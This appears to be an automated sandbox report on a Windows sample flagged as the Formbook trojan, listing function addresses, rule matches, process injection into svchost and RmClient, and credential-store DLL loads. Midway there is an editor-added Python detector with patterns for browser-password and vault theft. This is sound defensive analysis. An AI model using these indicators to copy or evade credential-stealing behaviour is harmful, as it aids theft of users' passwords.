            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E30535 | 5_2_02E30535
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E2EA80 | 5_2_02E2EA80
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EE6BD7 | 5_2_02EE6BD7
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EEAB40 | 5_2_02EEAB40
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E5E8F0 | 5_2_02E5E8F0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E168B8 | 5_2_02E168B8
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E3A840 | 5_2_02E3A840
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E32840 | 5_2_02E32840
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E329A0 | 5_2_02E329A0
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02EFA9A6 | 5_2_02EFA9A6
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: 5_2_02E46962 | 5_2_02E46962
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEEEDB5_2_02EEEEDB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E42E905_2_02E42E90
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EECE935_2_02EECE93
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E30E595_2_02E30E59
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEEE265_2_02EEEE26
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3CFE05_2_02E3CFE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E22FC85_2_02E22FC8
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EAEFA05_2_02EAEFA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA4F405_2_02EA4F40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E72F285_2_02E72F28
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E50F305_2_02E50F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED2F305_2_02ED2F30
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E20CF25_2_02E20CF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED0CB55_2_02ED0CB5
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E30C005_2_02E30C00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E2ADE05_2_02E2ADE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E48DBF5_2_02E48DBF
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3AD005_2_02E3AD00
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECCD1F5_2_02ECCD1F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED12ED5_2_02ED12ED
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4B2C05_2_02E4B2C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E352A05_2_02E352A0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E7739A5_2_02E7739A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E1D34C5_2_02E1D34C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE132D5_2_02EE132D
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE70E95_2_02EE70E9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF0E05_2_02EEF0E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EDF0CC5_2_02EDF0CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E370C05_2_02E370C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E3B1B05_2_02E3B1B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EFB16B5_2_02EFB16B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E6516C5_2_02E6516C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E1F1725_2_02E1F172
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE16CC5_2_02EE16CC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E756305_2_02E75630
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF7B05_2_02EEF7B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E214605_2_02E21460
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEF43F5_2_02EEF43F
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EF95C35_2_02EF95C3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECD5B05_2_02ECD5B0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE75715_2_02EE7571
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EDDAC65_2_02EDDAC6
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ECDAAC5_2_02ECDAAC
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E75AA05_2_02E75AA0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02ED1AA35_2_02ED1AA3
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA3A6C5_2_02EA3A6C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFA495_2_02EEFA49
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE7A465_2_02EE7A46
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA5BF05_2_02EA5BF0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E6DBF95_2_02E6DBF9
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4FB805_2_02E4FB80
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFB765_2_02EEFB76
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E338E05_2_02E338E0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E9D8005_2_02E9D800
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E399505_2_02E39950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4B9505_2_02E4B950
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EC59105_2_02EC5910
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E39EB05_2_02E39EB0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFFB15_2_02EEFFB1
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E31F925_2_02E31F92
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFF095_2_02EEFF09
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EEFCF25_2_02EEFCF2
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EA9C325_2_02EA9C32
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E4FDC05_2_02E4FDC0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE7D735_2_02EE7D73
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02E33D405_2_02E33D40
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02EE1D5A5_2_02EE1D5A
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006919905_2_00691990
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068C8C05_2_0068C8C0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068CAE05_2_0068CAE0
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0068AB605_2_0068AB60
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006950405_2_00695040
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006932205_2_00693220
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_0069321B5_2_0069321B
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_006AB6705_2_006AB670
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE2575_2_02CEE257
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE3735_2_02CEE373
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CED7785_2_02CED778
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE70C5_2_02CEE70C
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE7185_2_02CEE718
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CEE4DB5_2_02CEE4DB
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CF54515_2_02CF5451
            Source: C:\Windows\SysWOW64\RmClient.exeCode function: 5_2_02CECA335_2_02CECA33
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03675130 appears 58 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036BF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 036AEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0362B970 appears 280 times
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03687E54 appears 111 times
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02E77E54 appears 111 times
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02EAF290 appears 105 times
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02E65130 appears 58 times
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02E1B970 appears 280 times
            Source: C:\Windows\SysWOW64\RmClient.exe | Code function: String function: 02E9EA12 appears 86 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: String function: 004115D7 appears 36 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: String function: 00416C70 appears 39 times
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: String function: 00445AE0 appears 55 times
            Source: enkJ6J7dAn.exe, 00000000.00000003.2140430088.0000000003D33000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
            Source: enkJ6J7dAn.exe, 00000000.00000003.2142179487.000000000494D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs enkJ6J7dAn.exe
            Source: enkJ6J7dAn.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000005.00000002.4588417399.0000000000680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.2376344718.0000000005AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000003.00000002.4589939639.00000000026F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.2375723470.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000002.00000002.2374576384.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000005.00000002.4590169358.0000000000B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: 00000005.00000002.4590296108.0000000000BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 (same rule metadata as the first match above)
            Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/11
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0044AF6C GetLastError,FormatMessageW
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0047839D CoInitialize,CoCreateInstance,CoUninitialize
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | File created: C:\Users\user\AppData\Local\Temp\cacostomia
            Source: enkJ6J7dAn.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: RmClient.exe, 00000005.00000002.4588947900.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.00000000009F0000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4588947900.0000000000A1E000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2556441787.00000000009F0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: enkJ6J7dAn.exe | ReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | File read: C:\Users\user\Desktop\enkJ6J7dAn.exe
            Source: unknown | Process created: C:\Users\user\Desktop\enkJ6J7dAn.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: wsock32.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: mpr.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\RmClient.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\enkJ6J7dAn.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: C:\Windows\SysWOW64\RmClient.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
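The process-creation rows, the "Section loaded" rows and the Chromium `password_notes` schema string above are the parts of this report a responder would turn into host-level detections: svchost.exe started with a command line naming a different image (the hollowed host), a SysWOW64 utility (RmClient.exe) spawning Firefox, the same utility loading vaultcli.dll, winsqlite3.dll and dpapi.dll, and a Chromium Login Data table definition in its memory. The script below is an added example written by the editor, not Joe Sandbox or Elastic code. It parses rows in the fused "Source: ...Process created: ..." form the report uses, deduplicates the repeated rows, and derives those findings; the sample rows are copied from this report, while the browser list, the credential-DLL set and the indicator names are the editor's assumptions.

```python
"""Parse Joe Sandbox signature rows and derive host findings (added example)."""
import re
from collections import defaultdict
from pathlib import PureWindowsPath

# One row = "Source: <who>" fused with one of three detail kinds, optionally
# followed by the "Jump to behavior" link text the report viewer appends.
ROW_RE = re.compile(
    r'^Source:\s*(?P<src>.+?)'
    r'(?:Process created:\s*(?P<img>.+?)\s+"(?P<cmd>[^"]*)"'
    r'|Section loaded:\s*(?P<dll>[\w.]+?)'
    r'|Binary or memory string:\s*(?P<mem>.+?))'
    r'(?:Jump to behavior)?$'
)

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}  # assumed list
SYSTEM_DIRS = {r"c:\windows\syswow64", r"c:\windows\system32"}
CRED_DLLS = {"vaultcli.dll", "winsqlite3.dll", "dpapi.dll"}             # assumed set
CRED_SCHEMA = ("create table password_notes", "create table logins")  # Chromium Login Data DDL

# Constructed input: rows copied from this report, with one row repeated the
# way the report repeats it (once with the "Jump to behavior" link text).
SAMPLE_ROWS = r"""
Source: unknownProcess created: C:\Users\user\Desktop\enkJ6J7dAn.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Source: C:\Users\user\Desktop\enkJ6J7dAn.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\enkJ6J7dAn.exe"
Source: C:\Program Files (x86)\qMMscfYOaJVsvvwoxWKNjVjKgsZGdwzfiNkZOTOmcvHeNyaGgZTijVCYOWGYEWnlX\avmjQSNkeFbUoa.exeProcess created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\SysWOW64\RmClient.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
Source: C:\Users\user\Desktop\enkJ6J7dAn.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: winsqlite3.dllJump to behavior
Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: vaultcli.dllJump to behavior
Source: C:\Windows\SysWOW64\RmClient.exeSection loaded: dpapi.dllJump to behavior
Source: RmClient.exe, 00000005.00000002.4588947900.00000000009CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
"""


def _name(p):
    return PureWindowsPath(p).name.lower()


def _dir(p):
    return str(PureWindowsPath(p).parent).lower()


def parse_rows(text):
    """Return (process creations, {image: set(dlls)}, memory strings), deduplicated."""
    procs, seen = [], set()
    loads = defaultdict(set)
    memstr = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue
        if m["img"]:
            key = (m["src"], m["img"], m["cmd"])
            if key not in seen:          # the report lists the same row twice
                seen.add(key)
                procs.append(key)
        elif m["dll"]:
            loads[m["src"]].add(m["dll"].lower())
        elif m["mem"]:
            memstr.append((m["src"].split(",")[0], m["mem"]))
    return procs, loads, memstr


def analyze(text):
    """Map parsed rows to findings of the form (kind, subject, detail)."""
    procs, loads, memstr = parse_rows(text)
    findings = []
    for parent, image, cmd in procs:
        # Image name differs from the command line it was started with: the
        # process-replacement signature. Compare case-insensitively, otherwise
        # "Firefox.exe" vs "firefox.exe" (present in this report) is a false positive.
        if _name(cmd) != _name(image):
            findings.append(("image_cmdline_mismatch", image, cmd))
        # A System32/SysWOW64 utility launching a browser.
        if _dir(parent) in SYSTEM_DIRS and _name(image) in BROWSERS:
            findings.append(("browser_spawned_from_system_dir", parent, image))
    for image, dlls in loads.items():
        hit = sorted(dlls & CRED_DLLS)
        if len(hit) >= 2:  # any one of these is routine; the set together is credential access
            findings.append(("credential_store_dlls", image, ",".join(hit)))
    for src, s in memstr:
        if any(frag in s.lower() for frag in CRED_SCHEMA):
            findings.append(("browser_login_db_schema", src, s[:40]))
    return findings


if __name__ == "__main__":
    for kind, subject, detail in analyze(SAMPLE_ROWS):
        print(f"{kind:32} {subject} -> {detail}")
```

Run against the sample rows this yields exactly four findings, one per indicator, and the duplicated firefox.exe row is counted once. The same three checks translate directly to Sysmon Event ID 1 (Image vs CommandLine, ParentImage directory) and Event ID 7 (ImageLoaded) telemetry.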
            Source: enkJ6J7dAn.exe | Static file information: File size 1402195 > 1048576
            Source: Binary string: RmClient.pdbGCTL source: svchost.exe, 00000002.00000002.2374917499.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2374956046.0000000003019000.00000004.00000020.00020000.00000000.sdmp, avmjQSNkeFbUoa.exe, 00000003.00000002.4589350365.0000000000998000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: avmjQSNkeFbUoa.exe, 00000003.00000000.2259492562.000000000040E000.00000002.00000001.01000000.00000004.sdmp, avmjQSNkeFbUoa.exe, 00000006.00000000.2442142227.000000000040E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: enkJ6J7dAn.exe, 00000000.00000003.2141666109.0000000004680000.00000004.00001000.00020000.00000000.sdmp, enkJ6J7dAn.exe, 00000000.00000003.2141537980.0000000003C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2241727497.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2375121022.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243530836.0000000003400000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, RmClient.exe, 00000005.00000003.2377156797.0000000002C42000.00000004.00000020.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002F8E000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000002.4590623216.0000000002DF0000.00000040.00001000.00020000.00000000.sdmp, RmClient.exe, 00000005.00000003.2374869041.0000000000A6A000.00000004.00000020.00020000.00000000.sdmp
